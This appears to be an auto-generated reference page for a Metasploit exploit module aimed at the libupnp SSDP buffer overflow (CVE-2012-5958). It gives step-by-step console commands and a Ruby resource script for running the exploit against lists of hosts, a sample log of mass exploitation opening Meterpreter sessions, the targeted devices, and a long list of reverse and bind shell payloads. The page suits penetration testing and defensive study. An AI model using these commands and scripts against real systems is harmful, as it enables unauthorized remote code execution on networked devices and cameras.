Portable UPnP SDK unique_service_name() Remote Code Execution - Metasploit


This page contains detailed information about how to use the exploit/multi/upnp/libupnp_ssdp_overflow metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Portable UPnP SDK unique_service_name() Remote Code Execution
Module: exploit/multi/upnp/libupnp_ssdp_overflow
Source code: modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb
Disclosure date: 2013-01-29
Last modification time: 2020-10-02 17:38:06 +0000
Supported architecture(s): cmd
Supported platform(s): Unix
Target service / protocol: -
Target network port(s): 1900
List of CVEs: CVE-2012-5958

This module exploits a buffer overflow in the unique_service_name() function of libupnp's SSDP processor. The libupnp library is used across thousands of devices and is referred to as the Intel SDK for UPnP Devices or the Portable SDK for UPnP Devices. Due to size limitations on many devices, this exploit uses a separate TCP listener to stage the real payload.

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage


Using libupnp_ssdp_overflow against a single host

Normally, you can use exploit/multi/upnp/libupnp_ssdp_overflow this way:

msf > use exploit/multi/upnp/libupnp_ssdp_overflow
msf exploit(libupnp_ssdp_overflow) > show targets
    ... a list of targets ...
msf exploit(libupnp_ssdp_overflow) > set TARGET target-id
msf exploit(libupnp_ssdp_overflow) > show options
    ... show and set options ...
msf exploit(libupnp_ssdp_overflow) > exploit

Using libupnp_ssdp_overflow against multiple hosts

But it looks like this is a remote exploit module, which means you can also engage multiple hosts.

First, create a list of IPs you wish to exploit with this module. One IP per line.

Second, set up a background payload listener. This payload should be the same as the one your libupnp_ssdp_overflow will be using:

  1. Do: use exploit/multi/handler
  2. Do: set PAYLOAD [payload]
  3. Set other options required by the payload
  4. Do: set EXITONSESSION false
  5. Do: run -j

At this point, you should have a payload listening.

Next, create the following script. Notice you will probably need to modify the ip_list path, and payload options accordingly:

<ruby>
#
# Modify the path if necessary
#
ip_list = '/tmp/ip_list.txt'

File.open(ip_list, 'rb').each_line do |ip|
  print_status("Trying against #{ip}")
  run_single("use exploit/multi/upnp/libupnp_ssdp_overflow")
  run_single("set RHOST #{ip}")
  run_single("set DisablePayloadHandler true")

  #
  # Set a payload that's the same as the handler.
  # You might also need to add more run_single commands to configure other
  # payload options.
  #
  run_single("set PAYLOAD [payload name]")

  run_single("run")
end
</ruby>

Next, run the resource script in the console:

msf > resource [path-to-resource-script]

And finally, you should see that the exploit is trying against those hosts similar to the following MS08-067 example:

msf > resource /tmp/exploit_hosts.rc
[*] Processing /tmp/exploit_hosts.rc for ERB directives.
[*] resource (/tmp/exploit_hosts.rc)> Ruby Code (402 bytes)
[*] Trying against 192.168.1.80

RHOST => 192.168.1.80
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199

[*] 192.168.1.80:445 - Automatically detecting the target...
[*] 192.168.1.80:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.1.80:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.1.80:445 - Attempting to trigger the vulnerability...
[*] Sending stage (957999 bytes) to 192.168.1.80
[*] Trying against 192.168.1.109
RHOST => 192.168.1.109
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.109:445 - Automatically detecting the target...
[*] 192.168.1.109:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] 192.168.1.109:445 - We could not detect the language pack, defaulting to English
[*] 192.168.1.109:445 - Selected Target: Windows 2003 SP2 English (NX)
[*] 192.168.1.109:445 - Attempting to trigger the vulnerability...
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1071) at 2016-03-02 19:32:49 -0600

[*] Sending stage (957999 bytes) to 192.168.1.109
[*] Meterpreter session 2 opened (192.168.1.199:4444 -> 192.168.1.109:4626) at 2016-03-02 19:32:52 -0600

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Go back to menu.

Msfconsole Usage


Here is how the multi/upnp/libupnp_ssdp_overflow exploit module looks in the msfconsole:

msf6 > use exploit/multi/upnp/libupnp_ssdp_overflow

[*] No payload configured, defaulting to cmd/unix/reverse_netcat
msf6 exploit(multi/upnp/libupnp_ssdp_overflow) > show info

       Name: Portable UPnP SDK unique_service_name() Remote Code Execution
     Module: exploit/multi/upnp/libupnp_ssdp_overflow
   Platform: Unix
       Arch: cmd
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2013-01-29

Provided by:
  hdm <[email protected]>
  Alex Eubanks <[email protected]>
  Richard Harman <[email protected]>
  Frederic Basse <[email protected]>

Available targets:
  Id  Name
  --  ----
  0   Automatic
  1   Supermicro Onboard IPMI (X9SCL/X9SCM) Intel SDK 1.3.1
  2   Axis Camera M1011 5.20.1 UPnP/1.4.1
  3   Debug Target

Check supported:
  No

Basic options:
  Name    Current Setting  Required  Description
  ----    ---------------  --------  -----------
  CBHOST                   no        The listener address used for staging the real payload
  CBPORT                   no        The listener port used for staging the real payload
  RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT   1900             yes       The target port

Payload information:
  Space: 8000

Description:
  This module exploits a buffer overflow in the unique_service_name() 
  function of libupnp's SSDP processor. The libupnp library is used 
  across thousands of devices and is referred to as the Intel SDK for 
  UPnP Devices or the Portable SDK for UPnP Devices. Due to size 
  limitations on many devices, this exploit uses a separate TCP 
  listener to stage the real payload.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2012-5958
  OSVDB (89611)
  https://www.kb.cert.org/vuls/id/922681
  https://blog.rapid7.com/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play

Module Options


This is a complete list of options available in the multi/upnp/libupnp_ssdp_overflow exploit:

msf6 exploit(multi/upnp/libupnp_ssdp_overflow) > show options

Module options (exploit/multi/upnp/libupnp_ssdp_overflow):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   CBHOST                   no        The listener address used for staging the real payload
   CBPORT                   no        The listener port used for staging the real payload
   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   1900             yes       The target port

Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.204.3    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

Advanced Options


Here is a complete list of advanced options supported by the multi/upnp/libupnp_ssdp_overflow exploit:

msf6 exploit(multi/upnp/libupnp_ssdp_overflow) > show advanced

Module advanced options (exploit/multi/upnp/libupnp_ssdp_overflow):

   Name                    Current Setting  Required  Description
   ----                    ---------------  --------  -----------
   ContextInformationFile                   no        The information file that contains context information
   DisablePayloadHandler   false            no        Disable the handler code for the selected payload
   EnableContextEncoding   false            no        Use transient context when encoding payloads
   VERBOSE                 false            no        Enable detailed status messages
   WORKSPACE                                no        Specify the workspace for this module
   WfsDelay                10               no        Additional delay in seconds to wait for a session

Payload advanced options (cmd/unix/reverse_netcat):

   Name                        Current Setting  Required  Description
   ----                        ---------------  --------  -----------
   AutoRunScript                                no        A script to run automatically on session creation.
   AutoVerifySession           true             yes       Automatically verify and drop invalid sessions
   CommandShellCleanupCommand                   no        A command to run before the session is closed
   CreateSession               true             no        Create a new session for every successful login
   InitialAutoRunScript                         no        An initial script to run on session creation (before AutoRunScript)
   ReverseAllowProxy           false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                   no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                      no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                          no        The specific communication channel to use for this listener
   ReverseListenerThreaded     false            yes       Handle every connection in a new thread (experimental)
   StagerRetryCount            10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait             5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                     false            no        Enable detailed status messages
   WORKSPACE                                    no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the multi/upnp/libupnp_ssdp_overflow module can exploit:

msf6 exploit(multi/upnp/libupnp_ssdp_overflow) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic
   1   Supermicro Onboard IPMI (X9SCL/X9SCM) Intel SDK 1.3.1
   2   Axis Camera M1011 5.20.1 UPnP/1.4.1
   3   Debug Target

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the multi/upnp/libupnp_ssdp_overflow exploit:

msf6 exploit(multi/upnp/libupnp_ssdp_overflow) > show payloads

Compatible Payloads
===================

   #   Name                                        Disclosure Date  Rank    Check  Description
   -   ----                                        ---------------  ----    -----  -----------
   0   payload/cmd/unix/bind_awk                                    normal  No     Unix Command Shell, Bind TCP (via AWK)
   1   payload/cmd/unix/bind_busybox_telnetd                        normal  No     Unix Command Shell, Bind TCP (via BusyBox telnetd)
   2   payload/cmd/unix/bind_inetd                                  normal  No     Unix Command Shell, Bind TCP (inetd)
   3   payload/cmd/unix/bind_jjs                                    normal  No     Unix Command Shell, Bind TCP (via jjs)
   4   payload/cmd/unix/bind_lua                                    normal  No     Unix Command Shell, Bind TCP (via Lua)
   5   payload/cmd/unix/bind_netcat                                 normal  No     Unix Command Shell, Bind TCP (via netcat)
   6   payload/cmd/unix/bind_netcat_gaping                          normal  No     Unix Command Shell, Bind TCP (via netcat -e)
   7   payload/cmd/unix/bind_netcat_gaping_ipv6                     normal  No     Unix Command Shell, Bind TCP (via netcat -e) IPv6
   8   payload/cmd/unix/bind_nodejs                                 normal  No     Unix Command Shell, Bind TCP (via nodejs)
   9   payload/cmd/unix/bind_perl                                   normal  No     Unix Command Shell, Bind TCP (via Perl)
   10  payload/cmd/unix/bind_perl_ipv6                              normal  No     Unix Command Shell, Bind TCP (via perl) IPv6
   11  payload/cmd/unix/bind_r                                      normal  No     Unix Command Shell, Bind TCP (via R)
   12  payload/cmd/unix/bind_ruby                                   normal  No     Unix Command Shell, Bind TCP (via Ruby)
   13  payload/cmd/unix/bind_ruby_ipv6                              normal  No     Unix Command Shell, Bind TCP (via Ruby) IPv6
   14  payload/cmd/unix/bind_socat_udp                              normal  No     Unix Command Shell, Bind UDP (via socat)
   15  payload/cmd/unix/bind_zsh                                    normal  No     Unix Command Shell, Bind TCP (via Zsh)
   16  payload/cmd/unix/generic                                     normal  No     Unix Command, Generic Command Execution
   17  payload/cmd/unix/pingback_bind                               normal  No     Unix Command Shell, Pingback Bind TCP (via netcat)
   18  payload/cmd/unix/pingback_reverse                            normal  No     Unix Command Shell, Pingback Reverse TCP (via netcat)
   19  payload/cmd/unix/reverse                                     normal  No     Unix Command Shell, Double Reverse TCP (telnet)
   20  payload/cmd/unix/reverse_awk                                 normal  No     Unix Command Shell, Reverse TCP (via AWK)
   21  payload/cmd/unix/reverse_bash_telnet_ssl                     normal  No     Unix Command Shell, Reverse TCP SSL (telnet)
   22  payload/cmd/unix/reverse_jjs                                 normal  No     Unix Command Shell, Reverse TCP (via jjs)
   23  payload/cmd/unix/reverse_ksh                                 normal  No     Unix Command Shell, Reverse TCP (via Ksh)
   24  payload/cmd/unix/reverse_lua                                 normal  No     Unix Command Shell, Reverse TCP (via Lua)
   25  payload/cmd/unix/reverse_ncat_ssl                            normal  No     Unix Command Shell, Reverse TCP (via ncat)
   26  payload/cmd/unix/reverse_netcat                              normal  No     Unix Command Shell, Reverse TCP (via netcat)
   27  payload/cmd/unix/reverse_netcat_gaping                       normal  No     Unix Command Shell, Reverse TCP (via netcat -e)
   28  payload/cmd/unix/reverse_nodejs                              normal  No     Unix Command Shell, Reverse TCP (via nodejs)
   29  payload/cmd/unix/reverse_openssl                             normal  No     Unix Command Shell, Double Reverse TCP SSL (openssl)
   30  payload/cmd/unix/reverse_perl                                normal  No     Unix Command Shell, Reverse TCP (via Perl)
   31  payload/cmd/unix/reverse_perl_ssl                            normal  No     Unix Command Shell, Reverse TCP SSL (via perl)
   32  payload/cmd/unix/reverse_php_ssl                             normal  No     Unix Command Shell, Reverse TCP SSL (via php)
   33  payload/cmd/unix/reverse_python                              normal  No     Unix Command Shell, Reverse TCP (via Python)
   34  payload/cmd/unix/reverse_python_ssl                          normal  No     Unix Command Shell, Reverse TCP SSL (via python)
   35  payload/cmd/unix/reverse_r                                   normal  No     Unix Command Shell, Reverse TCP (via R)
   36  payload/cmd/unix/reverse_ruby                                normal  No     Unix Command Shell, Reverse TCP (via Ruby)
   37  payload/cmd/unix/reverse_ruby_ssl                            normal  No     Unix Command Shell, Reverse TCP SSL (via Ruby)
   38  payload/cmd/unix/reverse_socat_udp                           normal  No     Unix Command Shell, Reverse UDP (via socat)
   39  payload/cmd/unix/reverse_ssh                                 normal  No     Unix Command Shell, Reverse TCP SSH
   40  payload/cmd/unix/reverse_ssl_double_telnet                   normal  No     Unix Command Shell, Double Reverse TCP SSL (telnet)
   41  payload/cmd/unix/reverse_tclsh                               normal  No     Unix Command Shell, Reverse TCP (via Tclsh)
   42  payload/cmd/unix/reverse_zsh                                 normal  No     Unix Command Shell, Reverse TCP (via Zsh)

Evasion Options


Here is the full list of possible evasion options supported by the multi/upnp/libupnp_ssdp_overflow exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(multi/upnp/libupnp_ssdp_overflow) > show evasion

Module evasion options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Invalid target specified: no callback function defined


Here is a relevant code snippet related to the "Invalid target specified: no callback function defined" error message:

130:	    configure_socket
131:	
132:	    target_info = choose_target
133:	
134:	    unless self.respond_to?(target_info[:callback])
135:	      print_error("Invalid target specified: no callback function defined")
136:	      return
137:	    end
138:	
139:	    buffer = self.send(target_info[:callback])
140:	    pkt =

No target matches this fingerprint


Here is a relevant code snippet related to the "No target matches this fingerprint" error message:

421:	    self.targets.each do |t|
422:	      return t if t[:fingerprint] and res =~ t[:fingerprint]
423:	    end
424:	
425:	    if res and res.to_s.length > 0
426:	      print_status("No target matches this fingerprint")
427:	      print_status("")
428:	      res.to_s.split("\n").each do |line|
429:	        print_status("    #{line.strip}")
430:	      end
431:	      print_status("")

The system <RHOST> did not reply to our M-SEARCH probe


Here is a relevant code snippet related to the "The system <RHOST> did not reply to our M-SEARCH probe" error message:

428:	      res.to_s.split("\n").each do |line|
429:	        print_status("    #{line.strip}")
430:	      end
431:	      print_status("")
432:	    else
433:	      print_status("The system #{rhost} did not reply to our M-SEARCH probe")
434:	    end
435:	
436:	    fail_with(Failure::NoTarget, "No compatible target detected")
437:	  end
438:	

No compatible target detected


Here is a relevant code snippet related to the "No compatible target detected" error message:

431:	      print_status("")
432:	    else
433:	      print_status("The system #{rhost} did not reply to our M-SEARCH probe")
434:	    end
435:	
436:	    fail_with(Failure::NoTarget, "No compatible target detected")
437:	  end
438:	
439:	  # Accessor for our TCP payload stager
440:	  attr_accessor :service
441:	

Go back to menu.


References


See Also


Check also the following modules related to this module:

Related Nessus plugins:

Authors


  • hdm
  • Alex Eubanks <endeavor[at]rainbowsandpwnies.com>
  • Richard Harman <richard[at]richardharman.com>
  • Frederic Basse <contact[at]fredericb.info>

Version


This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.